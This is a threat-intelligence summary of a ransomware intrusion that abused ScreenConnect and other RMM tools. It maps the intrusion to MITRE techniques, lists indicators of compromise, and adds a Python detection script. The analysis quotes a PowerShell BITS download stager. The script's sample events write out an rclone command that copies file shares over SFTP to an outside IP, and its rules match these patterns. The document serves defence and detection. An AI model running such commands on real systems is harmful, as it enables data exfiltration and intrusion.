A multi-RMM intrusion in 2022 leveraged ScreenConnect to stage Hive ransomware, illustrating how adversaries abuse legitimate remote monitoring and management tools for initial access, command and control, and lateral movement. The operation progressed through Cobalt Strike and Metasploit payloads, credential dumping and exfiltration via Rclone to a domain-wide encryption attempt that ultimately encrypted key servers 61 hours after initial access. Hashtags: #ScreenConnect #HiveRansomware
Keypoints
- Adversaries used multiple remote monitoring & management (RMM) tools, including ScreenConnect, Atera, and Splashtop, as initial access and persistence mechanisms.
- Initial access originated from a user-downloaded executable masquerading as a document, likely delivered via email with a link.
- The intruders installed ScreenConnect, used BITS transfers and MSI/Rundll32 invocations, and conducted extensive internal discovery via standard Windows utilities.
- Lateral movement employed Impacket wmiexec.py, quser checks, RDP, and remote PowerShell/MSI installations (Atera/Splashtop).
- Credential dumping occurred with a Mimikatz variant (m2.exe), including LSASS access and password extraction.
- Exfiltration used Rclone over SFTP to a remote host, with netscan and manual hands-on-keyboard activity observed.
- The Hive ransomware was deployed after exfiltration, with domain-wide attempts via a misconfigured GPO/scheduled task that failed to encrypt domain-joined hosts at scale.
MITRE Techniques
- [T1566.002] Phishing – Delivery via phishing email with a link that caused the executable’s download when clicked on. ‘The campaign was likely delivered via an email, with a link, causing the executable’s download when clicked on.’
- [T1059.001] PowerShell – Use of PowerShell stagers and commands to download and execute payloads. ‘powershell.exe -nop -c "start-job { param($a) Import-Module BitsTransfer; … }’ and similar commands were observed.
- [T1059.003] Windows Command Shell – Command execution via command interpreter; MSI/Rundll32 usage observed during installation and execution. ‘command execution is performed by dropping the desired script on disc, followed by its execution through the appropriate interpreter (Command Prompt or PowerShell).’
- [T1543.003] Windows Service – Persistence via auto-start service (ScreenConnect/Atera). ‘ScreenConnect persistence as well as related command & control mechanisms are discussed in later sections.’
- [T1053.005] Scheduled Task – Domain-wide ransomware deployment via a new GPO carrying a scheduled task (though the domain-wide encryption failed). ‘created a new domain-wide GPO with a scheduled task intended to run the ransomware binary on each domain-joined host.’
- [T1021.001] Remote Services – Lateral movement using remote services to execute PowerShell and MSI installers (Atera/Splashtop) on a server. ‘moved to lateral movement using remote services to execute PowerShell and MSI installers for Atera and Splashtop on a server.’
- [T1047] Windows Management Instrumentation – Lateral movement via Impacket’s wmiexec.py. ‘Impacket’s wmiexec.py script to perform their actions.’
- [T1003.001] LSASS Memory – Credential dumping via Mimikatz. ‘the threat actor dropped the file m2.exe… mimikatz binary’ and ‘Mimikatz commands on execution.’
- [T1021.002] SMB/Windows Admin Shares – Lateral movement and file transfers over SMB (remote services), evidenced by file creation on admin shares recorded in Event ID 5145 (detailed file share access) events. ‘Remote Services… SMB file creation over SMB’
- [T1041] Exfiltration – Data exfiltration over SFTP to an external host using Rclone. ‘exfiltrate the file share’s contents over the SFTP connection.’
- [T1486] Data Encrypted for Impact – Hive ransomware encryption of key servers. ‘Once critical systems encrypted, the threat actor completed their impact with a final network share encryption.’
- [T1490] Inhibit System Recovery – Shadow copy deletion and boot settings alteration to hinder recovery. ‘inhibits system recovery by deleting all shadow copies and altering boot settings.’
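As an added defender-side example (not code from the DFIR Report), the following Python sketch runs a few detection rules for the techniques above over constructed process-creation records. The sample events are made up; the wmiexec.py output-redirection pattern (`cmd.exe /Q /c ... 1> \\127.0.0.1\ADMIN$\__<timestamp> 2>&1`) and the rclone `--sftp-host` flag are assumptions drawn from those tools' documented behaviour, not from the report.

```python
import re

# Constructed sample process-creation records (host, parent image, command line).
# None of these come from the report; they mimic the behaviours it describes.
SAMPLE_EVENTS = [
    ("ws01", "document8765.exe",
     'powershell.exe -nop -c "start-job { param($a) Import-Module BitsTransfer; Start-BitsTransfer $a }"'),
    ("srv02", "wmiprvse.exe",
     'cmd.exe /Q /c quser 1> \\\\127.0.0.1\\ADMIN$\\__1662000000.1 2>&1'),   # wmiexec.py style
    ("fs01", "cmd.exe",
     'rclone.exe copy E:\\Shares remote:backup --sftp-host 203.0.113.10'),    # exfil over SFTP
    ("ws01", "explorer.exe",
     'powershell.exe -File C:\\Scripts\\inventory.ps1'),                     # benign admin script
    ("srv02", "services.exe",
     'msiexec.exe /i C:\\Windows\\Temp\\setup.msi /quiet'),                  # silent RMM install
]

# Each rule: (name, compiled regex over the command line, MITRE technique it maps to).
RULES = [
    ("bits_stager", re.compile(r"powershell\.exe.*-nop.*BitsTransfer", re.I), "T1059.001"),
    ("wmiexec_pattern", re.compile(r"cmd\.exe /Q /c .*\\\\127\.0\.0\.1\\ADMIN\$\\__", re.I), "T1047"),
    ("rclone_sftp", re.compile(r"rclone(\.exe)?\s.*sftp", re.I), "T1041"),
    ("quiet_msi_install", re.compile(r"msiexec\.exe.*/i .*\.msi.*/q", re.I), "T1021.001"),
]


def detect(events=SAMPLE_EVENTS):
    """Return one (host, rule name, technique, command line) tuple per matching rule."""
    hits = []
    for host, _parent, cmdline in events:
        for name, pattern, technique in RULES:
            if pattern.search(cmdline):
                hits.append((host, name, technique, cmdline))
    return hits


def summarize_by_technique(hits):
    """Count hits per MITRE technique to show which tactics fired on the sample set."""
    counts = {}
    for _host, _name, technique, _cmd in hits:
        counts[technique] = counts.get(technique, 0) + 1
    return counts


if __name__ == "__main__":
    for host, name, technique, cmd in detect():
        print(f"{host}: {name} [{technique}] <- {cmd}")
    print(summarize_by_technique(detect()))
```

The quiet-MSI rule is noisy on its own and is meant for hunting in combination with the parent image and install path; the other three are specific enough to alert on directly.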
Indicators of Compromise
- [IP] 31.41.244.192, 23.108.57.83, 94.232.43.201 and 190.2.146.96 (the exfiltration target), all external to the environment
- [Domain] sodiwugoc[.]com, server-nixd7639ccc-relay[.]screenconnect[.]com, server-nixee656b9a-relay[.]screenconnect[.]com
- [URL] https://environmentca[.]com/bkh6q
- [File hash] ScreenConnect installer/macros: 81997F4404FEBFB9C23F2F3939934513D499593750B4A4826C32878E05B83F30, D04E7E776EA28AF69381E346A1BF86BE5F5E4715003F7048783E7D1F049B1BD2
- [File name] document8765.exe, setup.msi, m2.exe, netscan.exe
Read more: https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/